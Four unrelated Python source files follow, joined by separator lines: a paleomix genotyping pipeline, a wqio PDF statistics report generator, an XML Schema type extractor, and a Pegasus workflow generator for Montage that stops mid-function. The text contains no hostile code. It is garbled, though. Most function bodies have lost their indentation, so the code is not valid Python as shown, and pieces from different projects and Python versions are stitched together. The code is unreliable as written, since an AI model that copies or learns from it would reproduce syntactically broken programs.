# Copyright (c) 2012 Mikkel Schubert <MikkelSch@gmail.com>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
import os
from copy import deepcopy
from paleomix.common.fileutils import add_postfix, swap_ext
from paleomix.nodes.commands import (
BuildRegionsNode,
GenotypeRegionsNode,
PaddedBedNode,
VCFFilterNode,
)
from paleomix.nodes.samtools import BAMIndexNode, FastaIndexNode, TabixIndexNode
###############################################################################
###############################################################################
# Caches for nodes shared between multiple tasks
_BAI_CACHE = {}
_FAI_CACHE = {}
_BED_CACHE = {}
_VCF_CACHE = {}
def build_bam_index_node(bamfile):
"""Returns a node generating a BAI index (using SAMTools) for a BAM file;
the result is cached, to ensure that multiple calls for the same BAM does
not result in files being clobbered.
"""
if bamfile not in _BAI_CACHE:
_BAI_CACHE[bamfile] = BAMIndexNode(infile=bamfile)
return _BAI_CACHE[bamfile]
def build_fasta_index_node(reference):
if reference not in _FAI_CACHE:
_FAI_CACHE[reference] = FastaIndexNode(infile=reference)
return _FAI_CACHE[reference]
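# Illustrative sketch (exposition only): the module-level caches make node
# construction idempotent, so every task indexing the same BAM shares one
# BAMIndexNode. Assumes node construction does not require the BAM to exist.
def _demo_shared_index_node():
    first = build_bam_index_node("example.bam")
    second = build_bam_index_node("example.bam")
    assert first is second  # one index job per unique BAM path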
def build_regions_nodes(regions, padding, dependencies=()):
destination = add_postfix(regions["BED"], ".padded_%ibp" % (padding,))
if not padding:
return regions["BED"], dependencies
if destination not in _BED_CACHE:
dependencies = list(dependencies)
dependencies.append(build_fasta_index_node(regions["FASTA"]))
_BED_CACHE[destination] = PaddedBedNode(
fai_file=regions["FASTA"] + ".fai",
infile=regions["BED"],
outfile=destination,
amount=padding,
dependencies=dependencies,
)
return destination, (_BED_CACHE[destination],)
def _get_vcf_filter_options(genotyping, sample):
options = dict(genotyping["VCF_Filter"])
if options["MaxReadDepth"][sample]:
options["--max-read-depth"] = options["MaxReadDepth"][sample]
return options
def build_genotyping_bedfile_nodes(options, genotyping, sample, regions, dependencies):
bamfile = "%s.%s.bam" % (sample, regions["Prefix"])
bamfile = os.path.join(options.samples_root, bamfile)
prefix = regions["Genotypes"][sample]
padding, bedfile = genotyping["Padding"], None
if not genotyping["GenotypeEntirePrefix"]:
bedfile, nodes = build_regions_nodes(regions, padding, dependencies)
bai_node = build_bam_index_node(bamfile)
dependencies = nodes + (bai_node,)
else:
prefix = os.path.join(
os.path.dirname(prefix), "%s.%s.TEMP" % (sample, regions["Prefix"])
)
dependencies += (build_bam_index_node(bamfile),)
return prefix, bamfile, bedfile, dependencies
def build_genotyping_nodes_cached(options, genotyping, sample, regions, dependencies):
"""Carries out genotyping, filtering of calls, and indexing of files for a
given sample and prefix. If the option 'GenotypeEntirePrefix' is enabled,
    the BAM is genotyped once, and each set of RegionsOfInterest simply extracts
the relevant regions during construction of the consensus sequence.
Parameters:
options: An options object (c.f. paleomix.pipelines.phylo.config).
genotyping: Genotyping options defined for a specific set of areas of
interest, corresponding to Genotyping:NAME in the makefile.
sample: The name of the sample to be genotyped.
        regions: A dictionary for a 'RegionsOfInterest' from the makefile.
        dependencies: Dependencies that must be met before genotyping starts.
Returns a tuple containing the filename of the filtered and tabix-indexed
VCF file, and the top-level node generating this file. Multiple calls for
the same BAM and prefix will return the same VCF and nodes if the option
for 'GenotypeEntirePrefix' is enabled, otherwise each ROI is genotyped
    individually.
Output files are generated in ./results/PROJECT/genotyping. If the option
for 'GenotypeEntirePrefix' is enabled, the following files are generated:
SAMPLE.PREFIX.vcf.bgz: Unfiltered calls for variant/non-variant sites.
SAMPLE.PREFIX.filtered.vcf.bgz: Variant calls filtered with vcf_filter.
SAMPLE.PREFIX.filtered.vcf.bgz.tbi: Tabix index for the filtered VCF.
If 'GenotypeEntirePrefix' is not enabled for a given ROI, the following
files are generated for that ROI (see descriptions above):
SAMPLE.PREFIX.ROI.filtered.vcf.bgz
SAMPLE.PREFIX.ROI.filtered.vcf.bgz.tbi
SAMPLE.PREFIX.ROI.vcf.bgz
In addition, the following files are generated for each set of
RegionsOfInterest (ROI), regardless of the 'GenotypeEntirePrefix' option:
SAMPLE.PREFIX.ROI.CDS.fasta: FASTA sequence of each feature in the ROI.
SAMPLE.PREFIX.ROI.CDS.fasta.fai: FASTA index generated using SAMTools.
"""
output_prefix, bamfile, bedfile, dependencies = build_genotyping_bedfile_nodes(
options, genotyping, sample, regions, dependencies
)
if (bamfile, output_prefix) in _VCF_CACHE:
return _VCF_CACHE[(bamfile, output_prefix)]
calls = swap_ext(output_prefix, ".vcf.bgz")
filtered = swap_ext(output_prefix, ".filtered.vcf.bgz")
# 1. Call samtools mpilup | bcftools view on the bam
genotype = GenotypeRegionsNode(
reference=regions["FASTA"],
bedfile=bedfile,
infile=bamfile,
outfile=calls,
mpileup_options=genotyping["MPileup"],
bcftools_options=genotyping["BCFTools"],
dependencies=dependencies,
)
# 2. Filter all sites using the 'vcf_filter' command
vcffilter = VCFFilterNode(
infile=calls,
outfile=filtered,
regions=regions,
options=_get_vcf_filter_options(genotyping, sample),
dependencies=genotype,
)
# 3. Tabix index. This allows random-access to the VCF file when building
# the consensus FASTA sequence later in the pipeline.
tabix = TabixIndexNode(infile=filtered, preset="vcf", dependencies=[vcffilter])
_VCF_CACHE[(bamfile, output_prefix)] = (filtered, tabix)
return filtered, tabix
def build_genotyping_nodes(options, genotyping, sample, regions, dependencies):
"""Builds the nodes required for genotyping a BAM, in part or in whole.
By default, only the region of interest (including padding) will be
genotyped. However, if option 'GenotypeEntirePrefix' is enabled, the entire
genome is genotyped, and reused between different areas of interest.
In addition to the files generated by 'build_genotyping_nodes_cached', this
function generates the following files:
SAMPLE.PREFIX.ROI.fasta: FASTA containing each named region.
SAMPLE.PREFIX.ROI.fasta.fai: Index file built using "samtools faidx"
The function returns a sequence of the top-level nodes generating the files.
"""
    # 1. Get path of the filtered VCF file, and the associated node
filtered, node = build_genotyping_nodes_cached(
options=options,
genotyping=genotyping,
sample=sample,
regions=regions,
dependencies=dependencies,
)
# 2. Generate consensus sequence from filtered VCF
output_fasta = regions["Genotypes"][sample]
builder_options = {}
if regions["ProteinCoding"]:
builder_options["--whole-codon-indels-only"] = None
if not regions["IncludeIndels"]:
builder_options["--ignore-indels"] = None
builder = BuildRegionsNode(
infile=filtered,
bedfile=regions["BED"],
outfile=output_fasta,
padding=genotyping["Padding"],
options=builder_options,
dependencies=node,
)
    # 3. Index sequences to make retrieval easier for MSA
faidx = FastaIndexNode(infile=output_fasta, dependencies=[builder])
return (faidx,)
def build_sample_nodes(options, genotyping, regions_sets, sample, dependencies=()):
nodes = []
for regions in regions_sets.values():
regions = deepcopy(regions)
# Enforce homozygous contigs based on sex tag
regions["HomozygousContigs"] = regions["HomozygousContigs"][sample["Sex"]]
nodes.extend(
build_genotyping_nodes(
options=options,
genotyping=genotyping[regions["Name"]],
sample=sample["Name"],
regions=regions,
dependencies=dependencies,
)
)
return nodes
def chain(options, makefiles):
destination = options.destination
for makefile in makefiles:
regions_sets = makefile["Project"]["Regions"]
genotyping = makefile["Genotyping"]
options.destination = os.path.join(destination, makefile["Project"]["Title"])
nodes = []
for sample in makefile["Project"]["Samples"].values():
nodes.extend(
build_sample_nodes(
options, genotyping, regions_sets, sample, makefile["Nodes"]
)
)
makefile["Nodes"] = tuple(nodes)
options.destination = destination
|
|
import sys
import os
import io
from jinja2 import Environment, FileSystemLoader, FunctionLoader
import urllib
import base64
import copy
import gc
import numpy as np
import pandas as pd
import matplotlib as mpl
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
import seaborn as sns
import scipy.stats as stats
# pip install https://github.com/Geosyntec/python-pdfkit/archive/master.zip
import pdfkit
from ..utils import (html_template, css_template)
import wqio
sns.set(style='ticks', context='paper')
mpl.rcParams['text.usetex'] = False
mpl.rcParams['lines.markeredgewidth'] = .5
mpl.rcParams['font.family'] = ['sans-serif']
mpl.rcParams['mathtext.default'] = 'regular'
def make_table(loc):
# make table
singlevarfmtr = '{0:.3f}'
doublevarfmtr = '{0:.3f}; {1:.3f}'
multilinefmtr = '{0:.3f}\n({1:.3f}; {2:.3f})'
if loc.logmean is None:
logmean = np.nan
else:
logmean = loc.logmean
if loc.geomean is None:
geomean = np.nan
else:
geomean = loc.geomean
if loc.logstd is None:
logstd = np.nan
else:
logstd = loc.logstd
if loc.logmean_conf_interval is None:
logmean_conf_interval = [np.nan, np.nan]
else:
logmean_conf_interval = loc.logmean_conf_interval
if loc.geomean_conf_interval is None:
geomean_conf_interval = [np.nan, np.nan]
else:
geomean_conf_interval = loc.geomean_conf_interval
rows = [
['Count', singlevarfmtr.format(loc.N)],
['Number of NDs', singlevarfmtr.format(loc.ND)],
['Min; Max ({})'.format(loc.definition['unit']),
doublevarfmtr.format(loc.min,loc.max)],
['Mean ({})\n(95% confidence interval)'.format(loc.definition['unit']),
multilinefmtr.format(
loc.mean, *loc.mean_conf_interval)],
['Standard Deviation ({})'.format(loc.definition['unit']),
singlevarfmtr.format(loc.std)],
['Log. Mean\n(95% confidence interval)', multilinefmtr.format(
logmean, *logmean_conf_interval).replace('nan', '-')],
['Log. Standard Deviation', singlevarfmtr.format(logstd).replace('nan', '-')],
['Geo. Mean ({})\n(95% confidence interval)'.format(loc.definition['unit']),
multilinefmtr.format(
geomean, *geomean_conf_interval).replace('nan', '-')],
['Coeff. of Variation', singlevarfmtr.format(loc.cov)],
['Skewness', singlevarfmtr.format(loc.skew)],
['Median ({})\n(95% confidence interval)'.format(loc.definition['unit']),
multilinefmtr.format(
loc.median, *loc.median_conf_interval)],
['Quartiles ({})'.format(loc.definition['unit']),
doublevarfmtr.format(loc.pctl25, loc.pctl75)],
]
return pd.DataFrame(rows, columns=['Statistic', 'Result'])
def make_report(loc, savename, analyte=None, geolocation=None, statplot_options={}):
""" Produces a statistical report for the specified analyte.
Parameters
----------
loc : wqio.Location
The Location object to be summarized.
savename : str
Filename/path of the output pdf
analyte : str, optional
Optional name for the analyte in the ``loc``'s data.
statplot_options : dict, optional
        Dictionary of keyword arguments to be passed to
wqio.Location.statplot
Returns
-------
None
See also
--------
wqio.Location
wqio.Location.statplot
"""
if loc.full_data.shape[0] >= 3:
if analyte is None:
analyte = loc.definition.get("analyte", "unknown")
if geolocation is None:
geolocation = loc.definition.get("geolocation", "unknown")
unit = loc.definition['unit']
thershold = loc.definition['thershold']
if 'ylabel' not in statplot_options:
statplot_options['ylabel'] = analyte + ' ' + '(' + unit + ')'
if 'xlabel' not in statplot_options:
statplot_options['xlabel'] = 'Monitoring Location' #used to be geolocation
# make the table
table = make_table(loc)
table_html = table.to_html(index=False, justify='left').replace('\\n', '\n')
# wqio figure - !can move args to main func later!
fig = loc.statplot(**statplot_options)
ax1, ax2 = fig.get_axes()
ax1xlim = ax1.get_xlim()
ax2xlim = ax2.get_xlim()
if loc.dataframe[loc.dataframe[loc.cencol]].shape[0] > 0:
# print(loc.dataframe.head())
qntls, ranked = stats.probplot(loc.data, fit=False)
xvalues = stats.norm.cdf(qntls) * 100
            # pandas removed DataFrame.sort; sort_values is the replacement
            figdata = loc.dataframe.sort_values(by='modeled')
figdata['xvalues'] = xvalues
figdata = figdata[figdata[loc.cencol]]
ax2.plot(figdata.xvalues, figdata['modeled'], linestyle='', marker='s',
color='tomato', label='Extrapolated values')
ax2.plot(ax2xlim, [thershold]*2, color=sns.color_palette()[-1], label='Threshold')
handles, labels = ax2.get_legend_handles_labels()
labels[0] = 'Data'
ax2.legend(handles, labels, loc='best')
ax2.set_xlabel('Percent less than value')
ax1.set_xlim(ax1xlim)
ax2.set_xlim(ax2xlim)
ax2ylim = ax2.get_ylim()
ax1.set_ylim(ax2ylim)
fig.tight_layout()
# force figure to a byte object in memory then encode
boxplot_img = io.BytesIO()
fig.savefig(boxplot_img, format="png", dpi=300)
boxplot_img.seek(0)
boxplot_uri = ('data:image/png;base64,'
+ urllib.parse.quote(base64.b64encode(boxplot_img.read())))
# box plot legend
figl, axl = plt.subplots(1,1, figsize=(7,10))
img = mpimg.imread('box.png')
axl.imshow(img)
axl.xaxis.set_visible(False)
axl.yaxis.set_visible(False)
sns.despine(ax=axl, top=True, right=True, left=True, bottom=True)
legend_img = io.BytesIO()
figl.savefig(legend_img, format="png", dpi=300, bbox_inches='tight')
legend_img.seek(0)
legend_uri = ('data:image/png;base64,'
+ urllib.parse.quote(base64.b64encode(legend_img.read())))
# html magic
env = Environment(loader=FileSystemLoader(r'.\utils'))
template = env.from_string(html_template.getvalue())
# create pdf report
template_vars = {'analyte' : analyte,
'location': geolocation,
'analyte_table': table_html,
'legend': legend_uri,
'boxplot': boxplot_uri}
html_out = template.render(template_vars)
csst = copy.copy(css_template)
try:
print('Creating report {}'.format(savename))
pdf = pdfkit.from_string(html_out, savename, css=csst)
except OSError as e:
raise OSError('The tool cannot write to the destination path. '
'Please check that the destination pdf is not open.\n'
                          'Traceback:\n{}'.format(e))
plt.close(fig)
del boxplot_img
del figl
else:
        print('{} has fewer than 3 data points, skipping...'.format(savename))
print('\n')
gc.collect()
class PdfReport(object):
""" Class to generate generic 1-page reports from wqio objects.
Parameters
----------
path : str
Filepath to the CSV file containing input data.
analytecol : str (default = 'analyte')
Column in the input file that contains the analyte name.
rescol : str (default='res')
Column in the input file that contains the result values.
qualcol : str (default='qual')
Column in the input file that contains the data qualifiers
labeling data as right-censored (non-detect) or not.
ndvals : list of strings
List of values found in ``qualcol`` that flag data as being
right-censored (non-detect). Any value in ``qualcol`` that is
*not* in this list will be assumed to denote an uncensored
(detected value).
bsIter : int (default = 10000)
        Number of iterations used to refine statistics via a bias-
corrected and accelerated (BCA) bootstrapping method.
useROS : bool (default is True)
Toggles the use of regression-on-order statistics to estimate
censored (non-detect) values when computing summary statistics.
Examples
--------
>>> import wqreports
>>> report = wqreports.PdfReport("~/data/arsenic.csv", ndvals=['U', 'UJ', '<'])
>>> report.make_report(...)
"""
def __init__(self, path, analytecol='analyte', rescol='res',
qualcol='qual', unitcol='unit', locationcol='location',
thersholdcol='threshold', ndvals=['U'], bsIter=5000,
useROS=False):
self.filepath = path
self.ndvals = ndvals
self.final_ndval = 'ND'
self.bsIter = bsIter
self.useROS = useROS
self.analytecol = analytecol
self.unitcol = unitcol
self.locationcol = locationcol
self.thersholdcol = thersholdcol
self.rescol = rescol
self.qualcol = qualcol
self._rawdata = None
self._cleandata = None
self._analytes = None
self._geolocations = None
self._thresholds = None
self._locations = None
@property
def rawdata(self):
""" Raw data as parsed by pandas.read_csv(self.filepath)
"""
if self._rawdata is None:
self._rawdata = pd.read_csv(
self.filepath,
dtype={
self.analytecol: str,
self.unitcol: str,
self.locationcol: str,
self.thersholdcol: np.float64,
self.rescol: np.float64,
self.qualcol: str,
})
return self._rawdata
@property
def cleandata(self):
""" Cleaned data with simpler qualifiers.
"""
if self._cleandata is None:
self._cleandata = (
self.rawdata
.replace({self.qualcol:{_: self.final_ndval for _ in self.ndvals}})
)
return self._cleandata
@property
def analytes(self):
""" Simple list of the analytes to be analyzed.
"""
if self._analytes is None:
self._analytes = self.cleandata[self.analytecol].unique().tolist()
self._analytes.sort()
return self._analytes
@property
def geolocations(self):
"""Simple list of the physical locations in the dataset.
"""
if self._geolocations is None:
self._geolocations = self.cleandata[self.locationcol].unique().tolist()
self._geolocations.sort()
return self._geolocations
@property
def thresholds(self):
"""Simple dictionary of thresholds per each analyte.
"""
if self._thresholds is None:
thresholds = (self.cleandata.loc[:,[self.analytecol, self.thersholdcol]]
.drop_duplicates())
tshape = thresholds.shape[0]
thresholds = thresholds.set_index(self.analytecol).loc[:,self.thersholdcol]
thresholds = thresholds.to_dict()
if tshape != len(thresholds):
                e = ('An analyte has more than one threshold value, please'
                     ' check the input data')
raise ValueError(e)
self._thresholds = thresholds
return self._thresholds
@property
def locations(self):
""" Simple list of wqio.Location objects for each analyte.
"""
if self._locations is None:
self._locations = {}
gb = self.cleandata.groupby([self.locationcol, self.analytecol])
for gl, a in gb.groups.keys():
loc = self._make_location(gl, a)
loc.definition.update({"analyte": a, "geolocation": gl})
self._locations[(gl, a)] = loc
return self._locations
def _make_location(self, location, analyte):
""" Make a wqio.Location from an analyte.
Parameters
----------
analyte : string
The pollutant to be included in the Location.
Returns
-------
loc : wqio.Location
A wqio.Location object for the provided analyte.
"""
if analyte not in self.analytes:
raise ValueError("{} is not in the dataset".format(analyte))
if location not in self.geolocations:
raise ValueError("{} is not in the dataset".format(location))
# get target analyte
querystring = "{} == @location and {} == @analyte".format(self.locationcol, self.analytecol)
data = self.cleandata.query(querystring)
if data[self.unitcol].unique().shape[0] > 1:
            e = ('More than one unit detected for {}-{}. Please check the '
                 'input file'.format(location, analyte))
            raise ValueError(e)
loc = wqio.features.Location(data, bsIter=self.bsIter, ndval=self.final_ndval,
rescol=self.rescol, qualcol=self.qualcol,
useROS=self.useROS, include=True)
loc.definition = {
'unit': data[self.unitcol].iloc[0],
'thershold': self.thresholds[analyte]
}
return loc
def export_pdfs(self, output_path, basename=None, **statplot_options):
""" Export 1-pg summary PDF for each analyte in the data.
Parameters
----------
output_path : string
Folder path in which all PDFs will be saved
basename : string, optional
Prefix for the filename of each PDF. If omitted, the
            filename will simply be the analyte.
statplot_options : optional keyword arguments
Options passed directly to wqio.Location.statplot
"""
if basename is None:
basename = ""
for (geolocation, analyte), loc in self.locations.items():
san_geolocation = wqio.utils.processFilename(geolocation)
san_analyte = wqio.utils.processFilename(analyte)
filename = os.path.join(output_path, '{}{}{}.pdf'.format(
basename, san_geolocation, san_analyte))
# need to make a copy so that the dict does not get changed in
# the low functions
spo = copy.copy(statplot_options)
make_report(loc, filename, analyte=analyte, geolocation=geolocation,
statplot_options=spo)
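# Illustrative sketch (exposition only): a plain-pandas rendition of the
# duplicate-threshold check used in PdfReport.thresholds, with made-up data.
def _demo_threshold_lookup():
    df = pd.DataFrame({'analyte': ['As', 'As', 'Pb'],
                       'threshold': [10.0, 10.0, 15.0]})
    pairs = df.drop_duplicates()
    lookup = pairs.set_index('analyte')['threshold'].to_dict()
    assert pairs.shape[0] == len(lookup)  # one threshold per analyte
    assert lookup == {'As': 10.0, 'Pb': 15.0}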
|
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Imports
from collections import OrderedDict
import os
import StringIO
from lxml import etree
import process_includes
#
# Globals and constants
SchemaNS = 'http://www.w3.org/2001/XMLSchema'
Nsmap = OrderedDict({
'xs': SchemaNS,
})
#
# Functions for external use
#
# Classes
class TypeDescriptor(object):
def __init__(self, name, type_name=None):
self.name_ = name
self.type_name_ = type_name
self.type_obj_ = None
def __str__(self):
return '<%s -- name: %s type: %s>' % (self.__class__.__name__,
self.name, self.type_name,)
def get_name_(self):
return self.name_
def set_name_(self, name):
self.name_ = name
name = property(get_name_, set_name_)
def get_type_name_(self):
return self.type_name_
def set_type_name_(self, type_name):
self.type_name_ = type_name
type_name = property(get_type_name_, set_type_name_)
def get_type_obj_(self):
return self.type_obj_
def set_type_obj_(self, type_obj):
self.type_obj_ = type_obj
type_obj = property(get_type_obj_, set_type_obj_)
class ComplexTypeDescriptor(TypeDescriptor):
def __init__(self, name):
super(ComplexTypeDescriptor, self).__init__(name)
self.elements_ = []
self.attributes_ = OrderedDict()
def get_elements_(self):
return self.elements_
def set_elements_(self, elements):
self.elements_ = elements
elements = property(get_elements_, set_elements_)
def get_attributes_(self):
return self.attributes_
def set_attributes_(self, attributes):
self.attributes_ = attributes
attributes = property(get_attributes_, set_attributes_)
class SimpleTypeDescriptor(TypeDescriptor):
def __init__(self, name, type_name):
super(SimpleTypeDescriptor, self).__init__(name, type_name)
#
# Table of builtin types
Simple_type_names = [
'string',
'normalizedString',
'token',
'base64Binary',
'hexBinary',
'integer',
'positiveInteger',
'negativeInteger',
'nonNegativeInteger',
'nonPositiveInteger',
'long',
'unsignedLong',
'int',
'unsignedInt',
'short',
'unsignedShort',
'byte',
'unsignedByte',
'decimal',
'float',
'double',
'boolean',
'duration',
'dateTime',
'date',
'time',
'gYear',
'gYearMonth',
'gMonth',
'gMonthDay',
'gDay',
'Name',
'QName',
'NCName',
'anyURI',
'language',
'ID',
'IDREF',
'IDREFS',
'ENTITY',
'ENTITIES',
'NOTATION',
'NMTOKEN',
'NMTOKENS',
]
Builtin_descriptors = OrderedDict()
for name in Simple_type_names:
Builtin_descriptors[name] = SimpleTypeDescriptor(name, name)
#
# Functions for internal use and testing
def extract_descriptors(infile_name):
schema_file_name = os.path.join(
os.path.abspath(os.path.curdir),
infile_name)
infile = StringIO.StringIO()
process_includes.process_include_files(infile_name, infile,
inpath=schema_file_name)
infile.seek(0)
doc = etree.parse(infile)
root = doc.getroot()
return extract(root)
def get_descriptor_name(d):
return d.name
def extract(root):
unresolved = OrderedDict()
# Process top level simpleTypes. Resolve the base types.
nodes = root.xpath('xs:simpleType', namespaces=Nsmap)
for node in nodes:
name, type_name = get_simple_name_type(node)
descriptor = SimpleTypeDescriptor(name, type_name)
unresolved[name] = descriptor
resolved = resolve_simple_types(unresolved)
return export_defined_simple_types(resolved)
## for descriptor in resolved.itervalues():
## print '%s type name: %s' % (descriptor, descriptor.type_obj.name, )
def export_defined_simple_types(resolved):
simple_type_table = OrderedDict()
for descriptor in resolved.itervalues():
name = descriptor.name
prefix, type_name = get_prefix_name(descriptor.type_name)
simple_type_table[name] = SimpleTypeDescriptor(name, type_name)
return simple_type_table
def resolve_simple_types(unresolved):
resolved = OrderedDict()
#import pdb; pdb.set_trace()
sorted_descriptors = unresolved.values()
sorted_descriptors.sort(key=get_descriptor_name)
for descriptor in sorted_descriptors:
resolve_1_simple_type(descriptor, resolved, unresolved)
return resolved
def resolve_1_simple_type(descriptor, resolved, unresolved):
prefix, name = get_prefix_name(descriptor.type_name)
if name in Builtin_descriptors:
type_obj = Builtin_descriptors[name]
descriptor.type_obj = type_obj
resolved[descriptor.name] = descriptor
return type_obj
elif name in resolved:
type_obj = resolved[name].type_obj
descriptor.type_obj = type_obj
resolved[descriptor.name] = descriptor
return type_obj
else:
#import pdb; pdb.set_trace()
type_obj = resolve_1_simple_type(unresolved[name],
resolved, unresolved)
descriptor.type_obj = type_obj
resolved[descriptor.name] = descriptor
return type_obj
def get_simple_name_type(node):
type_name = None
name = node.get('name')
# Is it a restriction?
if name is not None:
nodes = node.xpath('.//xs:restriction', namespaces=Nsmap)
if nodes:
restriction = nodes[0]
type_name = restriction.get('base')
# Not a restriction. Try list.
if type_name is None:
nodes = node.xpath('.//xs:list', namespaces=Nsmap)
if nodes:
type_name = 'string'
# Not a list. Try union.
if type_name is None:
nodes = node.xpath('.//xs:union', namespaces=Nsmap)
if nodes:
union = nodes[0]
member_types = union.get('memberTypes')
if member_types:
member_types = member_types.split()
if member_types:
type_name = member_types[0]
return name, type_name
def get_prefix_name(tag):
prefix = ''
name = ''
items = tag.split(':')
if len(items) == 2:
prefix = items[0]
name = items[1]
elif len(items) == 1:
name = items[0]
return prefix, name
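# Illustrative sketch (exposition only): splitting a possibly-prefixed QName
# into its namespace prefix and local name.
def _demo_get_prefix_name():
    assert get_prefix_name('xs:string') == ('xs', 'string')
    assert get_prefix_name('string') == ('', 'string')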
def etxpath(node, pat):
nodes = node.xpath(pat, namespaces=Nsmap)
return nodes
|
|
#!/usr/bin/env python
"""
Pegasus DAX generator for the Montage toolkit. The generated
workflow will support multiple bands and colors to produce
a color image.
# Copyright 2016 University Of Southern California
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
import os
import argparse
import re
import subprocess
import sys
#Insert this directory in our search path
os.sys.path.insert(0, os.getcwd())
from astropy.io import ascii
from AutoADAG import *
from Pegasus.DAX3 import *
common_files = {}
replica_catalog = {}
def which(file):
for path in os.environ["PATH"].split(os.pathsep):
if os.path.exists(os.path.join(path, file)):
return os.path.join(path, file)
return None
def build_transformation_catalog(tc_target, dax):
"""
Some transformations in Montage uses multiple executables
"""
exes = {}
full_path = which("mProject")
if full_path is None:
raise RuntimeError("mProject is not in the $PATH")
base_dir = os.path.dirname(full_path)
f = open("data/tc.txt", "w")
if tc_target == "container":
f.write("cont montage {\n")
f.write(" type \"singularity\"\n")
f.write(" image \"library://ryantanaka/default/montage-workflow:6.0\"\n")
f.write(" profile env \"MONTAGE_HOME\" \"/opt/Montage\"\n")
f.write("}\n")
for fname in os.listdir(base_dir):
if fname == ".":
continue
#if fname == "mDiffFit":
# special compound transformation - see below
# continue
f.write("\n")
f.write("tr %s {\n" %(fname))
if tc_target == "regular":
f.write(" site local {\n")
f.write(" type \"STAGEABLE\"\n")
f.write(" arch \"x86_64\"\n")
f.write(" pfn \"file://%s/%s\"\n" %(base_dir, fname))
else:
# container
f.write(" site condor_pool {\n")
f.write(" type \"INSTALLED\"\n")
f.write(" container \"montage\"\n")
f.write(" pfn \"file://%s/%s\"\n" %(base_dir, fname))
# resource requirements
f.write(" profile condor \"request_memory\" \"ifthenelse(isundefined(DAGNodeRetry) || DAGNodeRetry == 0, 1024, 4096)\"\n")
f.write(" profile condor \"request_disk\" \"5G\"\n")
if fname in ["mProject", "mDiff", "mDiffFit", "mBackground"]:
f.write(" profile pegasus \"clusters.size\" \"3\"\n")
f.write(" }\n")
f.write("}\n")
f.close()
# some Montage tools depend on other tools
for tname in ["mDiffFit"]:
t = Transformation(tname)
if tname == "mDiffFit":
t.uses(Executable("mDiff"))
t.uses(Executable("mFitplane"))
t.uses(Executable("mDiffFit"))
dax.addTransformation(t)
def generate_region_hdr(dax, center, degrees):
global common_files
(crval1, crval2) = center.split()
crval1 = float(crval1)
crval2 = float(crval2)
cdelt = 0.000277778
naxis = int((float(degrees) / cdelt) + 0.5)
crpix = (naxis + 1) / 2.0
f = open("data/region.hdr", "w")
f.write("SIMPLE = T\n")
f.write("BITPIX = -64\n")
f.write("NAXIS = 2\n")
f.write("NAXIS1 = %d\n" %(naxis))
f.write("NAXIS2 = %d\n" %(naxis))
f.write("CTYPE1 = 'RA---TAN'\n")
f.write("CTYPE2 = 'DEC--TAN'\n")
f.write("CRVAL1 = %.6f\n" %(crval1))
f.write("CRVAL2 = %.6f\n" %(crval2))
f.write("CRPIX1 = %.6f\n" %(crpix))
f.write("CRPIX2 = %.6f\n" %(crpix))
f.write("CDELT1 = %.9f\n" %(-cdelt))
f.write("CDELT2 = %.9f\n" %(cdelt))
f.write("CROTA2 = %.6f\n" %(0.0))
f.write("EQUINOX = %d\n" %(2000))
f.write("END\n")
f.close()
common_files["region.hdr"] = File("region.hdr")
replica_catalog["region.hdr"] = {"url": "file://" + os.getcwd() + "/data/region.hdr", "site_label": "local"}
# we also need an oversized region which will be used in the first part of the
# workflow to get the background correction correct
f = open("data/region-oversized.hdr", "w")
f.write("SIMPLE = T\n")
f.write("BITPIX = -64\n")
f.write("NAXIS = 2\n")
f.write("NAXIS1 = %d\n" %(naxis + 3000))
f.write("NAXIS2 = %d\n" %(naxis + 3000))
f.write("CTYPE1 = 'RA---TAN'\n")
f.write("CTYPE2 = 'DEC--TAN'\n")
f.write("CRVAL1 = %.6f\n" %(crval1))
f.write("CRVAL2 = %.6f\n" %(crval2))
f.write("CRPIX1 = %.6f\n" %(crpix + 1500))
f.write("CRPIX2 = %.6f\n" %(crpix + 1500))
f.write("CDELT1 = %.9f\n" %(-cdelt))
f.write("CDELT2 = %.9f\n" %(cdelt))
f.write("CROTA2 = %.6f\n" %(0.0))
f.write("EQUINOX = %d\n" %(2000))
f.write("END\n")
f.close()
common_files["region-oversized.hdr"] = File("region-oversized.hdr")
replica_catalog["region-oversized.hdr"] = \
{"url": "file://" + os.getcwd() + "/data/region-oversized.hdr", "site_label": "local"}
def add_band(dax, band_id, center, degrees, survey, band, color):
global replica_catalog
band_id = str(band_id)
print("\nAdding band %s (%s %s -> %s)" %(band_id, survey, band, color))
    # data find - go a little bit outside the box - see mExec implementation
degrees_datafind = str(float(degrees) * 1.42)
cmd = "mArchiveList %s %s \"%s\" %s %s data/%s-images.tbl" \
%(survey, band, center, degrees_datafind, degrees_datafind, band_id)
print "Running sub command: " + cmd
if subprocess.call(cmd, shell=True) != 0:
print "Command failed!"
sys.exit(1)
replica_catalog["%s-images.tbl" %(band_id)] = \
{"url": "file://" + os.getcwd() + "/data/%s-images.tbl" %(band_id), \
"site_label": "local"}
# image tables
raw_tbl = File("%s-raw.tbl" %(band_id))
replica_catalog[raw_tbl.name] = \
{"url": "file://" + os.getcwd() + "/data/" + raw_tbl.name, "site_label": "local"}
projected_tbl = File("%s-projected.tbl" %(band_id))
